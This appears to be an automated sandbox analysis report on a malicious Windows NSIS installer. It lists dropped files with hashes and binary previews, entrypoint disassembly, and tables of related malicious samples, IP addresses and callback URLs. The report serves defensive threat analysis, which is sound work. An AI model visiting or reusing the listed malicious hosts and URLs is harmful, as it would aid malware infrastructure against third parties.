                                                                HDC Information:
                                                                • Successful, ratio: 22.8% (good quality ratio 20.6%)
                                                                • Quality average: 73.5%
                                                                • Quality standard deviation: 31.4%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 96
                                                                • Number of non-executed functions: 61
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 23.54.113.53, 104.42.151.234, 95.100.54.203, 20.50.102.62, 93.184.221.240, 23.10.249.26, 23.10.249.43, 20.54.26.129, 20.82.210.154
                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                23.227.38.74payment.exeGet hashmaliciousBrowse
                                                                • www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
                                                                Order.exeGet hashmaliciousBrowse
                                                                • www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
                                                                PO91361.exeGet hashmaliciousBrowse
                                                                • www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
                                                                RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                • www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                • www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
                                                                W88AZXFGH.exeGet hashmaliciousBrowse
                                                                • www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==
                                                                OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                • www.shopvivreluxe.com/smzu/?IB=XIQ4zU3AjC42PFCTOO37iro6/VjVaWUNsZ/SuojON2epSeHv79IyId/eqrs49S5DR7zK&ndlpdH=xPJtZdZP
                                                                P1 032021.exeGet hashmaliciousBrowse
                                                                • www.handmadebyaspenhillfarm.com/mdi/?Y4pT-VJH=4epUEO0tHWTXkdIcuRd6Nq0v/RBz/qAjN33S7V6Z6YNQB3lA9BQkHpvYTzVx/n7sMWEr&bl=VTChTb7HLlUx2na
                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                • www.blackdotdesignco.com/edbs/?MnZ=GXLpz&LZ9p=W7IwwUAwO8tYHUzxY5qwPA67mI48i7mcMh+3KyqAo8FMO4cNdDWXyrn0Vrl6iWoSTWRm
                                                                bank details.exeGet hashmaliciousBrowse
                                                                • www.trendyheld.com/edbs/?hnZpP0s0=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgo3TcK9QjJ98&ofutZl=yVMpQN-h
                                                                yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                • www.shopasadesigns.com/vu9b/?OV0xlV=ge6d+THkUDtRqIexQ9J4MhiYDry4CkKQPvWBxcXALAnCNL8Oe1hAq8L4N2Trr/ksdcC8&wh=jL0xYFb0mbwHi
                                                                Swift.exeGet hashmaliciousBrowse
                                                                • www.blackdotdesignco.com/edbs/?M6AlI=W7IwwUAwO8tYHUzxY5qwPA67mI48i7mcMh+3KyqAo8FMO4cNdDWXyrn0VoJ5+mkqe3swKvBNaA==&T8RH=9rqdJ4wpALk
                                                                TNUiVpymgH.exeGet hashmaliciousBrowse
                                                                • www.shopasadesigns.com/vu9b/?yhRdNvKX=ge6d+THkUDtRqIexQ9J4MhiYDry4CkKQPvWBxcXALAnCNL8Oe1hAq8L4N2TB0PUsZeK8&Sj=CTFH
                                                                onbgX3WswF.exeGet hashmaliciousBrowse
                                                                • www.nature-powered.com/c22b/?w6=gMZS0DD4xdXnmZLO9oC51+LMkZmn/HCE0RYVtN7igSqQcxUGuECj79cqyCCO8IY6B++S&1b=W6O4DXSP5
                                                                ORDER_PDF.exeGet hashmaliciousBrowse
                                                                • www.classicscanada.com/cm5a/?8pK0v4O=cqrD6ixJfu4MI41NpI00CNd2BrEDBGyKWXSZewN2Xa/6GV7xsJmsqawn7Dc6K+PkBTWZ&Ezr4uJ=arFPf47H12E0qr
                                                                list.dwg.exeGet hashmaliciousBrowse
                                                                • www.d8oildirect.com/bnk/?UlSt=GVg8CnZxINy4lv&tZi0=0yEi+rB9/kVhWTeJDgfcAPgAJ7kvZDnSDTItnMeSC/JK6D7v076q2a8Y2jDVTW0TEB/5
                                                                deIt7iuD1y.exeGet hashmaliciousBrowse
                                                                • www.baby-schutzen.com/vu9b/?1bz=jDKPMV0Psx7H2j&KnhT=RqrD3lbCOVSypt1Ana5vRH87o0Yi7KKhtv1D2uRffJK/JHu3JAOA0BSuF9IBqkV+wrKYXXMNWw==
                                                                TKmJNXmZis.exeGet hashmaliciousBrowse
                                                                • www.rideequihome.com/iu4d/?KtClV=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Cyo5mpIqfqK25udw==&lzuh=z8oHnHZ0U4
                                                                Customer Account Details.docxGet hashmaliciousBrowse
                                                                • www.rideequihome.com/iu4d/?RfIti=9rylC6y0IRAt&o48piLj=dYMXTz3tQHQPkdWHeUxsUovqIEfQQMeG6VT4/hac5nw0vddr21k9bzlaISC0wY+hEcrLTA==
                                                                ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                • www.fitandfierceathletics.com/aqu2/?rPj0Qr6=wWdGEuGAZ3PISuTrpOxNUQhIszymNYNQJw4PG0OoqbyR3mUSrG6OJiuygfdtHYPZRP+z&tXrx=gdkpfvSpm
                                                                67.205.188.68Updated SOA.xlsxGet hashmaliciousBrowse
                                                                • www.mywinnersworld.com/hx3a/?Llwtn4=0fll8pJv7eAQiLDJ6kinhno6RtSSoQWPS2hbGfJd5TIlsWrpk6jGyQfXOYBYXQeqE7QOEQ==&A8p=zVlpdR1X

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                www.mywinnersworld.comUpdated SOA.xlsxGet hashmaliciousBrowse
                                                                • 67.205.188.68
                                                                shops.myshopify.comNew Order.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                payment.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Order.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PO.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PO91361.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                W88AZXFGH.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PI 04-02-21.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                P1 032021.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                bank details.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PURCHASE ORDER _675765000.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                YMvYmQQyCz4gkqA.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Swift.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                TNUiVpymgH.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                INTERQGMOInternetIncJPPRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                • 150.95.52.74
                                                                DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                pvUopSIi7C5Eklw.exeGet hashmaliciousBrowse
                                                                • 163.44.239.72
                                                                BL-2010403L.exeGet hashmaliciousBrowse
                                                                • 118.27.99.27
                                                                INV-210318L.exeGet hashmaliciousBrowse
                                                                • 118.27.99.27
                                                                g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                oQJT5eueEX.exeGet hashmaliciousBrowse
                                                                • 150.95.255.38
                                                                Invoice.xlsxGet hashmaliciousBrowse
                                                                • 150.95.255.38
                                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                • 118.27.99.20
                                                                4xMdbgzeJQ.exeGet hashmaliciousBrowse
                                                                • 150.95.255.38
                                                                Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                products order pdf.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                • 118.27.99.27
                                                                Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                1LHKlbcoW3.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                tgorqDDBUa.exeGet hashmaliciousBrowse
                                                                • 163.44.239.78
                                                                7Q5Er1TObp.exeGet hashmaliciousBrowse
                                                                • 157.7.107.98
                                                                foHzqhWjvn.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                                • 163.44.239.73
                                                                WEBHOST1-ASRUi9EG6zNNQf.exeGet hashmaliciousBrowse
                                                                • 45.138.157.212
                                                                zfeISnMIsM.exeGet hashmaliciousBrowse
                                                                • 45.153.231.219
                                                                0y5uGFovqp.exeGet hashmaliciousBrowse
                                                                • 45.153.231.219
                                                                bid,12.17.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.102
                                                                bid,12.17.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.102
                                                                bid,12.17.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.102
                                                                specifics,12.16.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.102
                                                                specifics,12.16.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.102
                                                                specifics,12.16.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.102
                                                                certificate-12.16.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.114
                                                                certificate-12.16.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.114
                                                                certificate-12.16.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.114
                                                                enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.93
                                                                enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.93
                                                                enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.93
                                                                index.htaGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                http://phfvg141cruel.com/analytics/LSQwD5t2BeUGnP/G8_qFgBBGbZjcd8JDXL8c8GstBjE4NUfsHd/zzfp3?hHhX=DHLSFDKlZVUUrAz&ZZnZZ=IeACrr_VRiWdZf_&IEVY=TTWUhlBkEBZi&rKHt=qiYWQbrbKzGGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                legislate-12.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                legislate-12.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                input.12.07.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.22
                                                                DXTL-HKDXTLTseungKwanOServiceHKvbc.exeGet hashmaliciousBrowse
                                                                • 154.86.211.231
                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                • 154.219.109.119
                                                                BL01345678053567.exeGet hashmaliciousBrowse
                                                                • 45.192.251.55
                                                                pvUopSIi7C5Eklw.exeGet hashmaliciousBrowse
                                                                • 156.245.147.6
                                                                payment.exeGet hashmaliciousBrowse
                                                                • 154.219.105.199
                                                                New Order.exeGet hashmaliciousBrowse
                                                                • 45.199.49.95
                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                • 45.192.251.55
                                                                SAKKAB QUOTATION_REQUEST.exeGet hashmaliciousBrowse
                                                                • 154.86.211.135
                                                                SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                • 154.84.125.40
                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                • 154.219.193.141
                                                                SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                • 154.81.99.74
                                                                Purchase Orders.exeGet hashmaliciousBrowse
                                                                • 45.192.251.43
                                                                QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                • 156.239.96.43
                                                                Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                • 45.194.211.92
                                                                proforma.exeGet hashmaliciousBrowse
                                                                • 154.219.105.199
                                                                xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                                • 154.80.163.105
                                                                oQJT5eueEX.exeGet hashmaliciousBrowse
                                                                • 154.214.73.24
                                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                • 156.232.242.149
                                                                New Order.xlsxGet hashmaliciousBrowse
                                                                • 156.239.96.50
                                                                SWIFT001_jpg.exeGet hashmaliciousBrowse
                                                                • 175.29.36.135

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dllUpdated SOA.xlsxGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll
                                                                  Process:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5120
                                                                  Entropy (8bit):4.157754423334291
                                                                  Encrypted:false
                                                                  SSDEEP:48:St0ZBd/kqM1b5PHhqu8MUEm17OGa4zzBvoAXAdUMQ9BgqRuqS:ld/kfyZUGXHBgVueKx
                                                                  MD5:7C0BF830FA76E4A4D540EF51EC685997
                                                                  SHA1:00240D0CBD420B9B54F7795E15D1F6E92AE9D2DB
                                                                  SHA-256:6C4628D2A5D9FE67953D21A7AB0FF49BAC94B69FB32B5A1FA94AE8CB71A4D693
                                                                  SHA-512:95AE291760A5AC7F1CC72F7E40387A8E8BCBAFC262F021508D76DAAB0C1CB152C4EE518F156BF44F73014F8292A352E0EA509B3F88787A381F226E303E02E89C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  Joe Sandbox View:
                                                                  • Filename: Updated SOA.xlsx, Detection: malicious, Browse
                                                                  Reputation:low
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...z.n`...........!......................... ...............................`............@......................... !..T...`".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..0.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\s1min5obsmh
                                                                  Process:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6661
                                                                  Entropy (8bit):7.971988981636967
                                                                  Encrypted:false
                                                                  SSDEEP:96:ifIF/0cOvEQzFlnfCS7hoJiYv93UtnfYuxXyEphUzLrxFOrNkdHdFF2wy+jYPdlP:fpF6pzFB8XvwtfKZFzPF01PziTs
                                                                  MD5:EF56F8767AF49E69DA53598A8DD3FE95
                                                                  SHA1:04B3DD6AE4653A9D9191081901D531B5EA35465A
                                                                  SHA-256:B5524B63170C43392C14F0E6CF7E284345C7DDF3BCB5096F23B69AE40B786E9C
                                                                  SHA-512:FA9443B99CBB0B3F42E567D5CDA9A1D7760EE93E9A4186CFDF0B96F3C8B807DBBDA1AD1FD0C9A8D65065C78D841002A8D5255A963AB9BFAAE8E75E5E36827B7D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: ...u^*.....].%.u...%.Z.L.|.4.z5.3.m ..+...Dw.&....]....*\.6C3.^.ap.g.F23Thk..e.oLM&u.d......@|/..'.8xyR.Y9..d.JKl1......de>.../g(N...D1Y...l...q..$..a....LL.h.<=..M..A....0..Dx[.().;\f.s.g.....ui....M?.`..............~ *.......2............/C.O._.....4W..);:.L....J"..P..:4S..!N.m*#....E.J.@...r`"9Xp.{....+f~SR.."e.z.jd.!1.`.Z.."#Dxs..u(.|}VB......NOp....8..hiB..2..t....@.5-.....[ v9....S.H..<...>..S....4..w..w.,-.....N.... ..qm......GB...~$;.2V....].U.s...S. ...2'E....z....(3.....B..hZ..Z..F.$C....(..J..V.4U.....0..L.......A....G.~.n$.D5f.%Y23i....Q......P...y....A..%F.O`...tuN...B.l....k..z...)......Q........pl.8..Z?\a.....?.!Do..S...8&..W..y...():.t.C...`.i..n..K..a.......*}N......*...y.....^;T;.#>.g..l,...]..K.....U.u..>..n3B..a/..l\../v..Sy;.Jf.+.5...S/.n...W......U-.....M#7XY..$]....j+L.D.H.v.6o.#:G..:U~..t.{L}.j..6..FG.5..\..gX.O.Q....K..`.G..........eQ.....Vi$...V..;>...01...z...)...+n....... ...&..<....di..........&..%....
                                                                  C:\Users\user\AppData\Local\Temp\z48eaiospth
                                                                  Process:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):164864
                                                                  Entropy (8bit):7.998870102830855
                                                                  Encrypted:true
                                                                  SSDEEP:3072:kZaUuXIqUKJjdQ4MuD+gw2NkXhf8HNGLvQlrG3BoPg3yjw57f2p1XQMpyb:gaTXIqU2QADiwk+ovQliaIO1Lp4
                                                                  MD5:30FA9FE5A45263CC2DAD1E49C0B514EE
                                                                  SHA1:B485A73189B8B69E11D6A998FEC0D02ECD97085D
                                                                  SHA-256:460BED5F9F6B0D5E2B70BF57AF995E72CDDFADED4CB666D6D0258EFD3BA1C91C
                                                                  SHA-512:FCAF0498F03D6EAFD0E802591D08635CD271A8CF97747FE1371B7C1A887294F1443F8408B1D28E64E981CE7CBCF62DA801376078C6FA3B2C3776D554D9B44C97
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: .w...W......T..@.7....d.k.U.snT.]%.~.~.~A+.S.n"...k.......r.j..}..\..2.f...w...7..<].E..?$.........*..9..^..!...MG....4..Vi.._vWMF.7[...........u........f...".4.....Z...`.RhZ~...l..T...MU....4.J....@$...O.fD.t)..c..}W..9G..f..............}E......[.=.<...F......K.q$..9.4.!...~..7..&.....b /......xa[.......0.".^'..........7 Ps...$).YMz~.......].(j.]&.".=..5r.}.e..L[.2.7b....O..5...._...9m6~F_...D...K2Sk\)..]........5.....K...-..k.H...pZ......w.[)d..1WmtG.~.....P#.....F.M.lAp.2...JU2..x...b.B8s.-.....bdU4n...@.(,....q.....`n?/..Vw....6.Y..SB0$.N.`i)p?.w.;b...r..DH../U...aw...Q......j....A...%.d.3Rj...\.9&..9M.A...}.r.w/..'Q!E.%1..+.C.......[r...P`xh............Nt.B...m...Z..8r.w......H..x..t+:.....e..7.....D=.=..2.]..u*+^.j.'o.;.d#MN....!|...]....o..WJ.[`.;.......SuK3..9....... R...q..d.\....x........9".'...(H....0..F.0Zc..cL...........i.8..:f.mJ.wz....63....=..dVK.W........c.....7..........]..y.:..........(.WB.|....[........=.D....S.....E

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.466305160327421
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:AQJEKNHnWK.exe
                                                                  File size:371388
                                                                  MD5:5d8702803555ff684424ebd13eda9f47
                                                                  SHA1:f8b1197457782ba958fc7178fb838119c8138374
                                                                  SHA256:f7e96b7c6612b709e413bbc8c72796cadbb7ce91ed17ec77d5ba4d4422e729cb
                                                                  SHA512:45b4c4536c3cbb95ca5a93e721fff7e197bd27558f1646bdbdde42db62786cf6d323f056556b05fd4ee6b7806971492e9683a99f17481ce8c1649d872d6b55d9
                                                                  SSDEEP:6144:ndQzbPzOFZni219PFibpbvnl6gTaTXIqU2QADiwk+ovQliaIO1Lpt:k+dONwqYfDiwk+ooli6Vb
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z...H<.....J1.....

                                                                  File Icon

                                                                  Icon Hash:0cbeb1368b82a600

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40314a
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 0000017Ch
                                                                  push ebx
                                                                  push ebp
                                                                  push esi
                                                                  xor esi, esi
                                                                  push edi
                                                                  mov dword ptr [esp+18h], esi
                                                                  mov ebp, 00409240h
                                                                  mov byte ptr [esp+10h], 00000020h
                                                                  call dword ptr [00407030h]
                                                                  push esi
                                                                  call dword ptr [00407270h]
                                                                  mov dword ptr [007A3030h], eax
                                                                  push esi
                                                                  lea eax, dword ptr [esp+30h]
                                                                  push 00000160h
                                                                  push eax
                                                                  push esi
                                                                  push 0079E540h
                                                                  call dword ptr [00407158h]
                                                                  push 00409230h
                                                                  push 007A2780h
                                                                  call 00007FC7F0A14AF8h
                                                                  mov ebx, 007AA400h
                                                                  push ebx
                                                                  push 00000400h
                                                                  call dword ptr [004070B4h]
                                                                  call 00007FC7F0A12239h
                                                                  test eax, eax
                                                                  jne 00007FC7F0A122F6h
                                                                  push 000003FBh
                                                                  push ebx
                                                                  call dword ptr [004070B0h]
                                                                  push 00409228h
                                                                  push ebx
                                                                  call 00007FC7F0A14AE3h
                                                                  call 00007FC7F0A12219h
                                                                  test eax, eax
                                                                  je 00007FC7F0A12412h
                                                                  mov edi, 007A9000h
                                                                  push edi
                                                                  call dword ptr [00407140h]
                                                                  call dword ptr [004070ACh]
                                                                  push eax
                                                                  push edi
                                                                  call 00007FC7F0A14AA1h
                                                                  push 00000000h
                                                                  call dword ptr [00407108h]
                                                                  cmp byte ptr [007A9000h], 00000022h
                                                                  mov dword ptr [007A2F80h], eax
                                                                  mov eax, edi
                                                                  jne 00007FC7F0A122DCh
                                                                  mov byte ptr [esp+10h], 00000022h
                                                                  mov eax, 00000001h

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x28bf7.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x3ac0000x28bf70x28c00False0.550972967791data6.60623395491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x3ac2800xffaaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                  RT_ICON0x3bc22c0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                  RT_ICON0x3cca540x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_ICON0x3d0c7c0x25a8data
                                                                  RT_ICON0x3d32240x10a8data
                                                                  RT_ICON0x3d42cc0x468GLS_BINARY_LSB_FIRST
                                                                  RT_DIALOG0x3d47340x100dataEnglishUnited States
                                                                  RT_DIALOG0x3d48340x11cdataEnglishUnited States
                                                                  RT_DIALOG0x3d49500x60dataEnglishUnited States
                                                                  RT_GROUP_ICON0x3d49b00x5adata
                                                                  RT_MANIFEST0x3d4a0c0x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                  Imports

                                                                  DLLImport
